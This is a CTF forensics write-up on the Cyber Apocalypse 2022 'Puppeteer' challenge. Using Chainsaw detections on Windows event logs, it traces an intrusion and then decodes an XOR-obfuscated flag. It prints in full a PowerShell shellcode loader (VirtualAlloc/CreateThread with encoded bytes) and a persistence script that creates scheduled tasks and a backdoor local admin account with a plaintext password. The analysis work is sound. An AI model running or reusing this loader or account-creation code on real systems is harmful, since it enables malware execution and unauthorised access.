In this challenge we are given a bunch of evtx Microsoft Event Viewer log files. At the beginning I didn't know how to mess with this type of log files, however, after some googling I found this amazing post.
This post suggests using a tool named Chainsaw, so that's what I did. After some tries, I came out with the following command:
./chainsaw hunt ~/CTF/CyberApocalypse2022/Puppeteer/Logs/ --rules sigma_rules/ --mapping mapping_files/sigma-mapping.yml --full --lateral-all
As we can see, this tool generates a report based on the log files:
By F-Secure Countercept (@FranticTyping, @AlexKornitzer)
[+] Found 143 EVTX files
[+] Converting detection rules...
[+] Loaded 868 detection rules (92 were not loaded)
[+] Hunting: [========================================] 143/143
[+] Detection: (External Rule) - Suspicious Powershell ScriptBlock
βββββββββββββββββββββββ¬βββββββ¬βββββββββββββββββββββββββββββββββββ¬ββββββββββββββββ¬βββββββββββββββββββββββββββββββββββββββββββ
β system_time β id β detection_rules β computer_name β Event.EventData.ScriptBlockText β
βββββββββββββββββββββββΌβββββββΌβββββββββββββββββββββββββββββββββββΌββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββ€
β 2022-05-06 15:40:31 β 4104 β β£ Accessing WinAPI in PowerShell β "Council-HQ" β $OleSPrlmhB = @"[DllImport("kernel32.dll β
β β β β β ")]public static extern IntPtr VirtualAl β
β β β β β loc(IntPtr lpAddress, uint dwSize, uint β
β β β β β flAllocationType, uint flProtect);[DllIm β
β β β β β port("kernel32.dll")]public static exter β
β β β β β n IntPtr CreateThread(IntPtr lpThreadAtt β
β β β β β ributes, uint dwStackSize, IntPtr lpStar β
β β β β β tAddress, IntPtr lpParameter, uint dwCre β
β β β β β ationFlags, IntPtr lpThreadId);"@[byte[] β
β β β β β ] $stage1 = 0x99, 0x85, 0x93, 0xaa, 0xb3 β
β β β β β , 0xe2, 0xa6, 0xb9, 0xe5, 0xa3, 0xe2, 0x β
β β β β β 8e, 0xe1, 0xb7, 0x8e, 0xa5, 0xb9, 0xe2, β
β β β β β 0x8e, 0xb3;[byte[]] $stage2 = 0xac, 0xff β
β β β β β , 0xff, 0xff, 0xe2, 0xb2, 0xe0, 0xa5, 0x β
β β β β β a2, 0xa4, 0xbb, 0x8e, 0xb7, 0xe1, 0x8e, β
β β β β β 0xe4, 0xa5, 0xe1, 0xe1;$tNZvQCljVk = Add β
β β β β β -Type -memberDefinition $OleSPrlmhB -Nam β
β β β β β e "Win32" -namespace Win32Functions -pas β
β β β β β sthru;[Byte[]] $HVOASfFuNSxRXR = 0x2d,0x β
β β β β β 99,0x52,0x35,0x21,0x39,0x1d,0xd1,0xd1,0x β
β β β β β d1,0x90,0x80,0x90,0x81,0x83,0x99,0xe0,0x β
β β β β β 03,0xb4,0x99,0x5a,0x83,0xb1,0x99,0x5a,0x β
β β β β β 83,0xc9,0x80,0x87,0x99,0x5a,0x83,0xf1,0x β
β β β β β 99,0xde,0x66,0x9b,0x9b,0x9c,0xe0,0x18,0x β
β β β β β 99,0x5a,0xa3,0x81,0x99,0xe0,0x11,0x7d,0x β
β β β β β ed,0xb0,0xad,0xd3,0xfd,0xf1,0x90,0x10,0x β
β β β β β 18,0xdc,0x90,0xd0,0x10,0x33,0x3c,0x83,0x β
β β β β β 99,0x5a,0x83,0xf1,0x90,0x80,0x5a,0x93,0x β
β β β β β ed,0x99,0xd0,0x01,0xb7,0x50,0xa9,0xc9,0x β
β β β β β da,0xd3,0xde,0x54,0xa3,0xd1,0xd1,0xd1,0x β
β β β β β 5a,0x51,0x59,0xd1,0xd1,0xd1,0x99,0x54,0x β
β β β β β 11,0xa5,0xb6,0x99,0xd0,0x01,0x5a,0x99,0x β
β β β β β c9,0x81,0x95,0x5a,0x91,0xf1,0x98,0xd0,0x β
β β β β β 01,0x32,0x87,0x99,0x2e,0x18,0x9c,0xe0,0x β
β β β β β 18,0x90,0x5a,0xe5,0x59,0x99,0xd0,0x07,0x β
β β β β β 99,0xe0,0x11,0x90,0x10,0x18,0xdc,0x7d,0x β
β β β β β 90,0xd0,0x10,0xe9,0x31,0xa4,0x20,0x9d,0x β
β β β β β d2,0x9d,0xf5,0xd9,0x94,0xe8,0x00,0xa4,0x β
β β β β β 09,0x89,0x95,0x5a,0x91,0xf5,0x98,0xd0,0x β
β β β β β 01,0xb7,0x90,0x5a,0xdd,0x99,0x95,0x5a,0x β
β β β β β 91,0xcd,0x98,0xd0,0x01,0x90,0x5a,0xd5,0x β
β β β β β 59,0x90,0x89,0x90,0x89,0x8f,0x88,0x99,0x β
β β β β β d0,0x01,0x8b,0x90,0x89,0x90,0x88,0x90,0x β
β β β β β 8b,0x99,0x52,0x3d,0xf1,0x90,0x83,0x2e,0x β
β β β β β 31,0x89,0x90,0x88,0x8b,0x99,0x5a,0xc3,0x β
β β β β β 38,0x9a,0x2e,0x2e,0x2e,0x8c,0x98,0x6f,0x β
β β β β β a6,0xa2,0xe3,0x8e,0xe2,0xe3,0xd1,0xd1,0x β
β β β β β 90,0x87,0x98,0x58,0x37,0x99,0x50,0x3d,0x β
β β β β β 71,0xd0,0xd1,0xd1,0x98,0x58,0x34,0x98,0x β
β β β β β 6d,0xd3,0xd1,0xd4,0xe8,0x11,0x79,0xd1,0x β
β β β β β c3,0x90,0x85,0x98,0x58,0x35,0x9d,0x58,0x β
β β β β β 20,0x90,0x6b,0x9d,0xa6,0xf7,0xd6,0x2e,0x β
β β β β β 04,0x9d,0x58,0x3b,0xb9,0xd0,0xd0,0xd1,0x β
β β β β β d1,0x88,0x90,0x6b,0xf8,0x51,0xba,0xd1,0x β
β β β β β 2e,0x04,0xbb,0xdb,0x90,0x8f,0x81,0x81,0x β
β β β β β 9c,0xe0,0x18,0x9c,0xe0,0x11,0x99,0x2e,0x β
β β β β β 11,0x99,0x58,0x13,0x99,0x2e,0x11,0x99,0x β
β β β β β 58,0x10,0x90,0x6b,0x3b,0xde,0x0e,0x31,0x β
β β β β β 2e,0x04,0x99,0x58,0x16,0xbb,0xc1,0x90,0x β
β β β β β 89,0x9d,0x58,0x33,0x99,0x58,0x28,0x90,0x β
β β β β β 6b,0x48,0x74,0xa5,0xb0,0x2e,0x04,0x54,0x β
β β β β β 11,0xa5,0xdb,0x98,0x2e,0x1f,0xa4,0x34,0x β
β β β β β 39,0x42,0xd1,0xd1,0xd1,0x99,0x52,0x3d,0x β
β β β β β c1,0x99,0x58,0x33,0x9c,0xe0,0x18,0xbb,0x β
β β β β β d5,0x90,0x89,0x99,0x58,0x28,0x90,0x6b,0x β
β β β β β d3,0x08,0x19,0x8e,0x2e,0x04,0x52,0x29,0x β
β β β β β d1,0xaf,0x84,0x99,0x52,0x15,0xf1,0x8f,0x β
β β β β β 58,0x27,0xbb,0x91,0x90,0x88,0xb9,0xd1,0x β
β β β β β c1,0xd1,0xd1,0x90,0x89,0x99,0x58,0x23,0x β
β β β β β 99,0xe0,0x18,0x90,0x6b,0x89,0x75,0x82,0x β
β β β β β 34,0x2e,0x04,0x99,0x58,0x12,0x98,0x58,0x β
β β β β β 16,0x9c,0xe0,0x18,0x98,0x58,0x21,0x99,0x β
β β β β β 58,0x0b,0x99,0x58,0x28,0x90,0x6b,0xd3,0x β
β β β β β 08,0x19,0x8e,0x2e,0x04,0x52,0x29,0xd1,0x β
β β β β β ac,0xf9,0x89,0x90,0x86,0x88,0xb9,0xd1,0x β
β β β β β 91,0xd1,0xd1,0x90,0x89,0xbb,0xd1,0x8b,0x β
β β β β β 90,0x6b,0xda,0xfe,0xde,0xe1,0x2e,0x04,0x β
β β β β β 86,0x88,0x90,0x6b,0xa4,0xbf,0x9c,0xb0,0x β
β β β β β 2e,0x04,0x98,0x2e,0x1f,0x38,0xed,0x2e,0x β
β β β β β 2e,0x2e,0x99,0xd0,0x12,0x99,0xf8,0x17,0x β
β β β β β 99,0x54,0x27,0xa4,0x65,0x90,0x2e,0x36,0x β
β β β β β 89,0xbb,0xd1,0x88,0x98,0x16,0x13,0x21,0x β
β β β β β 64,0x73,0x87,0x2e,0x04;[array]::Reverse( β
β β β β β $stage2);$hRffYLENA = $tNZvQCljVk::Virtu β
β β β β β alAlloc(0,[Math]::Max($HVOASfFuNSxRXR.Le β
β β β β β ngth,0x1000),0x3000,0x40);$stage3 = $sta β
β β β β β ge1 + $stage2;[System.Runtime.InteropSer β
β β β β β vices.Marshal]::Copy($HVOASfFuNSxRXR,0,$ β
β β β β β hRffYLENA,$HVOASfFuNSxRXR.Length);# Unpa β
β β β β β ck Shellcode;for($i=0; $i -lt $HVOASfFuN β
β β β β β SxRXR.count ; $i++){ $HVOASfFuNSxRXR[$i β
β β β β β ] = $HVOASfFuNSxRXR[$i] -bxor 0xd1;}#Unp β
β β β β β ack Special Orders!for($i=0;$i -lt $stag β
β β β β β e3.count;$i++){ $stage3[$i] = $stage3[$ β
β β β β β i] -bxor 0xd1;}$tNZvQCljVk::CreateThread β
β β β β β (0,0,$hRffYLENA,0,0,0); β
βββββββββββββββββββββββΌβββββββΌβββββββββββββββββββββββββββββββββββΌββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββ€
β 2022-05-06 15:43:51 β 4104 β β£ PowerShell Create Local β "Council-HQ" β # Create a new task action$taskAction = β
β β β User β β New-ScheduledTaskAction -Execute 'powers β
β β β β β hell.exe';$taskTrigger = New-ScheduledTa β
β β β β β skTrigger -Daily -At 3PM;# The name of y β
β β β β β our scheduled task.$taskName = "Elevate β
β β β β β Powers"# Describe the scheduled task.$de β
β β β β β scription = "Steal weapons"# Register th β
β β β β β e scheduled taskRegister-ScheduledTask - β
β β β β β TaskName $taskName -Action $taskAction - β
β β β β β Trigger $taskTrigger -Description $descr β
β β β β β iption# Create a new task action$taskAct β
β β β β β ion = New-ScheduledTaskAction -Execute ' β
β β β β β powershell.exe';$taskTrigger = New-Sched β
β β β β β uledTaskTrigger -Daily -At 3PM;# The nam β
β β β β β e of your scheduled task.$taskName = "Sa β
β β β β β botage Miyuki"# Describe the scheduled t β
β β β β β ask.$description = "Bypass Arms Embargo" β
β β β β β # Register the scheduled taskRegister-Sc β
β β β β β heduledTask -TaskName $taskName -Action β
β β β β β $taskAction -Trigger $taskTrigger -Descr β
β β β β β iption $description#start windows update β
β β β β β serviceGet-Service -Name wuauserv | Sta β
β β β β β rt-Service -Verbose#delete childsGet-Chi β
β β β β β ldItem "C:\Windows\SoftwareDistribution\ β
β β β β β *" -Recurse -Force -Verbose -ErrorAction β
β β β β β SilentlyContinue | remove-item -force - β
β β β β β Verbose -recurse -ErrorAction SilentlyCo β
β β β β β ntinue#clear temp folderGet-ChildItem "C β
β β β β β :\users\*\AppData\Local\Temp\*" -Recurse β
β β β β β -Force -ErrorAction SilentlyContinue |W β
β β β β β here-Object { ($_.CreationTime -lt $(Get β
β β β β β -Date).AddDays(-$DaysToDelete))} |remove β
β β β β β -item -force -Verbose -recurse -ErrorAct β
β β β β β ion SilentlyContinuecleanmgr /sagerun:12 β
β β β β β do {"waiting for cleanmgr to complete. . β
β β β β β ."start-sleep 5} while ((get-wmiobject β
β β β β β win32_process | where-object {$_.process β
β β β β β name -eq βcleanmgr.exeβ} | measure).coun β
β β β β β t)# Create Admin Accountfunction Create- β
β β β β β NewLocalAdmin { [CmdletBinding()] para β
β β β β β m ( [string] $NewLocalAdmin, [secu β
β β β β β restring] $Password ) begin { } β
β β β β β process { New-LocalUser "$NewLocalAdm β
β β β β β in" -Password $Password -FullName "$NewL β
β β β β β ocalAdmin" -Description "Temporary local β
β β β β β admin" Write-Verbose "$NewLocalAdmin β
β β β β β local user crated" Add-LocalGroupMem β
β β β β β ber -Group "Administrators" -Member "$Ne β
β β β β β wLocalAdmin" Write-Verbose "$NewLocal β
β β β β β Admin added to the local administrator g β
β β β β β roup" } end { }}$NewLocalAdmin = "b β
β β β β β ackup_op";$Password = ConvertTo-SecureSt β
β β β β β ring "sup3rk3y" -AsPlainText -Force;Crea β
β β β β β te-NewLocalAdmin -NewLocalAdmin $NewLoca β
β β β β β lAdmin -Password $Password β
βββββββββββββββββββββββ΄βββββββ΄βββββββββββββββββββββββββββββββββββ΄ββββββββββββββββ΄βββββββββββββββββββββββββββββββββββββββββββ
[+] Detection: (Built-in Logic) - Windows Defender Detections
βββββββββββββββββββββββ¬βββββββ¬βββββββββββββββ¬βββββββββββββββββββββββββββββββββββββββββ¬βββββββββββββββββββββββββββββββββββββββββ¬βββββββββββββββββββββββββββββββ
β system_time β id β computer β threat_name β threat_file β user β
βββββββββββββββββββββββΌβββββββΌβββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββ€
β 2022-05-06 15:40:17 β 1116 β "Council-HQ" β "TrojanDropper:PowerShell/Ploty.gen!A" β "amsi:_C:\\sysmgr\\special_orders.ps1" β "Council-HQ\\Council Leader" β
βββββββββββββββββββββββ΄βββββββ΄βββββββββββββββ΄βββββββββββββββββββββββββββββββββββββββββ΄βββββββββββββββββββββββββββββββββββββββββ΄βββββββββββββββββββββββββββββββ
[+] Detection: (Built-in Logic) - New User Created
βββββββββββββββββββββββ¬βββββββ¬ββββββββββββββββββββ¬βββββββββββββββββββββββ¬ββββββββββββββββββββββββββββββββββββββββββββββββββ
β system_time β id β computer β target_username β user_sid β
βββββββββββββββββββββββΌβββββββΌββββββββββββββββββββΌβββββββββββββββββββββββΌββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2022-05-06 15:23:59 β 4720 β "Council-HQ" β "Council Leader" β "S-1-5-21-2389065719-3342106636-307857974-1001" β
βββββββββββββββββββββββΌβββββββΌββββββββββββββββββββΌβββββββββββββββββββββββΌββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2022-05-06 15:29:00 β 4720 β "Council-HQ" β "sysadm" β "S-1-5-21-2389065719-3342106636-307857974-1002" β
βββββββββββββββββββββββΌβββββββΌββββββββββββββββββββΌβββββββββββββββββββββββΌββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2022-05-06 15:44:04 β 4720 β "Council-HQ" β "backup_op" β "S-1-5-21-2389065719-3342106636-307857974-1003" β
βββββββββββββββββββββββΌβββββββΌββββββββββββββββββββΌβββββββββββββββββββββββΌββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2022-05-07 01:19:36 β 4720 β "WIN-GE1PLB8KFNS" β "WDAGUtilityAccount" β "S-1-5-21-2389065719-3342106636-307857974-504" β
βββββββββββββββββββββββΌβββββββΌββββββββββββββββββββΌβββββββββββββββββββββββΌββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2022-05-07 01:20:58 β 4720 β "DESKTOP-DBOP9M0" β "defaultuser0" β "S-1-5-21-2389065719-3342106636-307857974-1000" β
βββββββββββββββββββββββ΄βββββββ΄ββββββββββββββββββββ΄βββββββββββββββββββββββ΄ββββββββββββββββββββββββββββββββββββββββββββββββββ
[+] Detection: (Built-in Logic) - User added to interesting group
βββββββββββββββββββββββ¬βββββββ¬ββββββββββββββββββββ¬ββββββββββββββββββββββββββββ¬ββββββββββββββββββββββββββββββββββββββββββββββββββ¬βββββββββββββββββββ
β system_time β id β computer β change_type β user_sid β target_group β
βββββββββββββββββββββββΌβββββββΌββββββββββββββββββββΌββββββββββββββββββββββββββββΌββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββ€
β 2022-05-06 15:20:57 β 4732 β "DESKTOP-DBOP9M0" β User added to local group β "S-1-5-21-2389065719-3342106636-307857974-1000" β "Administrators" β
βββββββββββββββββββββββΌβββββββΌββββββββββββββββββββΌββββββββββββββββββββββββββββΌββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββ€
β 2022-05-06 15:23:59 β 4732 β "Council-HQ" β User added to local group β "S-1-5-21-2389065719-3342106636-307857974-1001" β "Administrators" β
βββββββββββββββββββββββΌβββββββΌββββββββββββββββββββΌββββββββββββββββββββββββββββΌββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββ€
β 2022-05-06 15:29:07 β 4732 β "Council-HQ" β User added to local group β "S-1-5-21-2389065719-3342106636-307857974-1002" β "Administrators" β
βββββββββββββββββββββββΌβββββββΌββββββββββββββββββββΌββββββββββββββββββββββββββββΌββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββ€
β 2022-05-06 15:44:04 β 4732 β "Council-HQ" β User added to local group β "S-1-5-21-2389065719-3342106636-307857974-1003" β "Administrators" β
βββββββββββββββββββββββ΄βββββββ΄ββββββββββββββββββββ΄ββββββββββββββββββββββββββββ΄ββββββββββββββββββββββββββββββββββββββββββββββββββ΄βββββββββββββββββββ
[+] 12 Detections found
If we analyze the report, we can see that a 'TrojanDropper' has been spotted in the 'Council-HQ' computer under the 'Council Leader' user. The thread file seems to be a Powershell one and, if we look at the top of the report, we can find a very suspicious Powershell script located in 'Council-HQ' computer, the same computer that has been infected.
If we fix the Powershell script format, we end having the following:
$OleSPrlmhB = @""[DllImport(""kernel32.dll"")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport(""kernel32.dll"")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
""@
[byte[]] $stage1 = 0x99, 0x85, 0x93, 0xaa, 0xb3, 0xe2, 0xa6, 0xb9, 0xe5, 0xa3, 0xe2, 0x8e, 0xe1, 0xb7, 0x8e, 0xa5, 0xb9, 0xe2, 0x8e, 0xb3;
[byte[]] $stage2 = 0xac, 0xff, 0xff, 0xff, 0xe2, 0xb2, 0xe0, 0xa5, 0xa2, 0xa4, 0xbb, 0x8e, 0xb7, 0xe1, 0x8e, 0xe4, 0xa5, 0xe1, 0xe1;
$tNZvQCljVk = Add-Type -memberDefinition $OleSPrlmhB -Name ""Win32"" -namespace Win32Functions -passthru;
[byte[]] $HVOASfFuNSxRXR = 0x2d,0x99,0x52,0x35,0x21,0x39,0x1d,0xd1,0xd1,0xd1,0x90,0x80,0x90,0x81,0x83,0x99,0xe0,0x03,0xb4,0x99,0x5a,0x83,0xb1,0x99,0x5a,0x83,0xc9,0x80,0x87,0x99,0x5a,0x83,0xf1,0x99,0xde,0x66,0x9b,0x9b,0x9c,0xe0,0x18,0x99,0x5a,0xa3,0x81,0x99,0xe0,0x11,0x7d,0xed,0xb0,0xad,0xd3,0xfd,0xf1,0x90,0x10,0x18,0xdc,0x90,0xd0,0x10,0x33,0x3c,0x83,0x99,0x5a,0x83,0xf1,0x90,0x80,0x5a,0x93,0xed,0x99,0xd0,0x01,0xb7,0x50,0xa9,0xc9,0xda,0xd3,0xde,0x54,0xa3,0xd1,0xd1,0xd1,0x5a,0x51,0x59,0xd1,0xd1,0xd1,0x99,0x54,0x11,0xa5,0xb6,0x99,0xd0,0x01,0x5a,0x99,0xc9,0x81,0x95,0x5a,0x91,0xf1,0x98,0xd0,0x01,0x32,0x87,0x99,0x2e,0x18,0x9c,0xe0,0x18,0x90,0x5a,0xe5,0x59,0x99,0xd0,0x07,0x99,0xe0,0x11,0x90,0x10,0x18,0xdc,0x7d,0x90,0xd0,0x10,0xe9,0x31,0xa4,0x20,0x9d,0xd2,0x9d,0xf5,0xd9,0x94,0xe8,0x00,0xa4,0x09,0x89,0x95,0x5a,0x91,0xf5,0x98,0xd0,0x01,0xb7,0x90,0x5a,0xdd,0x99,0x95,0x5a,0x91,0xcd,0x98,0xd0,0x01,0x90,0x5a,0xd5,0x59,0x90,0x89,0x90,0x89,0x8f,0x88,0x99,0xd0,0x01,0x8b,0x90,0x89,0x90,0x88,0x90,0x8b,0x99,0x52,0x3d,0xf1,0x90,0x83,0x2e,0x31,0x89,0x90,0x88,0x8b,0x99,0x5a,0xc3,0x38,0x9a,0x2e,0x2e,0x2e,0x8c,0x98,0x6f,0xa6,0xa2,0xe3,0x8e,0xe2,0xe3,0xd1,0xd1,0x90,0x87,0x98,0x58,0x37,0x99,0x50,0x3d,0x71,0xd0,0xd1,0xd1,0x98,0x58,0x34,0x98,0x6d,0xd3,0xd1,0xd4,0xe8,0x11,0x79,0xd1,0xc3,0x90,0x85,0x98,0x58,0x35,0x9d,0x58,0x20,0x90,0x6b,0x9d,0xa6,0xf7,0xd6,0x2e,0x04,0x9d,0x58,0x3b,0xb9,0xd0,0xd0,0xd1,0xd1,0x88,0x90,0x6b,0xf8,0x51,0xba,0xd1,0x2e,0x04,0xbb,0xdb,0x90,0x8f,0x81,0x81,0x9c,0xe0,0x18,0x9c,0xe0,0x11,0x99,0x2e,0x11,0x99,0x58,0x13,0x99,0x2e,0x11,0x99,0x58,0x10,0x90,0x6b,0x3b,0xde,0x0e,0x31,0x2e,0x04,0x99,0x58,0x16,0xbb,0xc1,0x90,0x89,0x9d,0x58,0x33,0x99,0x58,0x28,0x90,0x6b,0x48,0x74,0xa5,0xb0,0x2e,0x04,0x54,0x11,0xa5,0xdb,0x98,0x2e,0x1f,0xa4,0x34,0x39,0x42,0xd1,0xd1,0xd1,0x99,0x52,0x3d,0xc1,0x99,0x58,0x33,0x9c,0xe0,0x18,0xbb,0xd5,0x90,0x89,0x99,0x58,0x28,0x90,0x6b,0xd3,0x08,0x19,0x8e,0x2e,0x04,0x52,0x29,0xd1,0xaf,0x84,0x99,0x52,0x15,0xf1,0x8f,0x58,0x27,0xbb,0x91,0x90,0x88,0xb9,0xd1,0xc1,0xd1,0xd1,0x90,0x89,0x99,0x58,0x23,0x99,0xe0,0x18,0x90,0x6b,0x89,0x75,0x82,0x34,0x2e,0x04,0x99,0x58,0x12,0x98,0x58,0x16,0x9c,0xe0,0x18,0x98,0x58,0x21,0x99,0x58,0x0b,0x99,0x58,0x28,0x90,0x6b,0xd3,0x08,0x19,0x8e,0x2e,0x04,0x52,0x29,0xd1,0xac,0xf9,0x89,0x90,0x86,0x88,0xb9,0xd1,0x91,0xd1,0xd1,0x90,0x89,0xbb,0xd1,0x8b,0x90,0x6b,0xda,0xfe,0xde,0xe1,0x2e,0x04,0x86,0x88,0x90,0x6b,0xa4,0xbf,0x9c,0xb0,0x2e,0x04,0x98,0x2e,0x1f,0x38,0xed,0x2e,0x2e,0x2e,0x99,0xd0,0x12,0x99,0xf8,0x17,0x99,0x54,0x27,0xa4,0x65,0x90,0x2e,0x36,0x89,0xbb,0xd1,0x88,0x98,0x16,0x13,0x21,0x64,0x73,0x87,0x2e,0x04;
[array]: :Reverse($stage2);
$hRffYLENA = $tNZvQCljVk::VirtualAlloc(0,[Math]: :Max($HVOASfFuNSxRXR.Length,0x1000),0x3000,0x40);
$stage3 = $stage1 + $stage2;
[System.Runtime.InteropServices.Marshal]: :Copy($HVOASfFuNSxRXR,0,$hRffYLENA,$HVOASfFuNSxRXR.Length);
# Unpack Shellcode;
for($i=0; $i -lt $HVOASfFuNSxRXR.count ; $i++)
{
$HVOASfFuNSxRXR[$i] = $HVOASfFuNSxRXR[$i] -bxor 0xd1;
}
#Unpack Special Orders!
for($i=0;$i -lt $stage3.count;$i++)
{
$stage3[$i] = $stage3[$i] -bxor 0xd1;
}
$tNZvQCljVk: :CreateThread(0,0,$hRffYLENA,0,0,0);
After taking a look to this script, we can arrive to the following statements:
-
There are three strange byte arrays in the code: stage1, stage2 and HVOASfFuNSxRXR.
-
stage1 and stage2 are concatenated to create stage3.
-
After this concatenation, HVOASfFuNSxRXR and stage3 are 'decoded' using a bitwise XOR with the hex value 0xd1.
Once we have discovered this, we can proceed to manually decode the byte arrays. To achieve this goal, I opened a Powershell prompt and replicated the loops in the code.
- HVOASfFuNSxRXR byte array:
We can't see the full output on the screenshot but, sadly, if we convert the decimal values into ASCII we don't have anything readable here.
- stage3 byte array:
In this case we have the following output:
72 84 66 123 98 51 119 104 52 114 51 95 48 102 95 116 104 51 95 98 125 46 46 46 51 99 49 116 115 117 106 95 102 48 95 53 116 48 48
If we turn these decimal values into ASCII, we'll see something very similar to a flag, we just need to reverse the second half of the string!